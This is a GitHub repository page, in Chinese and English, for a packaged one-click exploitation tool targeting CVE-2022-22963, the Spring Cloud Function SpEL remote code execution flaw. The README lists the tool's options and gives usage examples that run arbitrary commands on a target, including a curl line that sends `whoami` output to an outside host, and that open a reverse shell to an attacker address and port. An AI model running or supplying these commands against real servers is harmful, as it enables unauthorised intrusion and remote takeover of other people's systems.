Skip to content

charis3306/CVE-2022-22963

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2022-22963 (spring cloud function sple rce)

spring cloud function 一键利用工具! by charis

已打包为exe文件开箱即用

命令主题

usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

options:
  -h, --help         show this help message and exit
  --check CHECK      检测方式post或get方式,--check get --check post
  --route ROUTE      检测路由,默认是functionRouter
  --url URL          输入利用的url
  --ip IP            反弹shell地址ip
  --port PORT        反弹shell地址端口
  --proxies PROXIES  启用代理
  --cmd CMD          要执行的命令

--check 是必选项

所用帮助主题

Spring-cloud-function-spel0.2.exe --help

image

默认检测--check 是必须选,--route是漏洞存在的路由。 注意如果不借助dnslog 或sleep 进行探测会存有误报!

Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top

image

执行命令验证是否能利用
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --cmd "curl http://192.168.1.3:8080/`whoami`"

image

反弹shell
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --ip 192.168.1.3 --port 9999

image

如果你觉得还不错请给我一个star

问题反馈lssues 或邮箱联系我charis3306@outlook.com

About

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages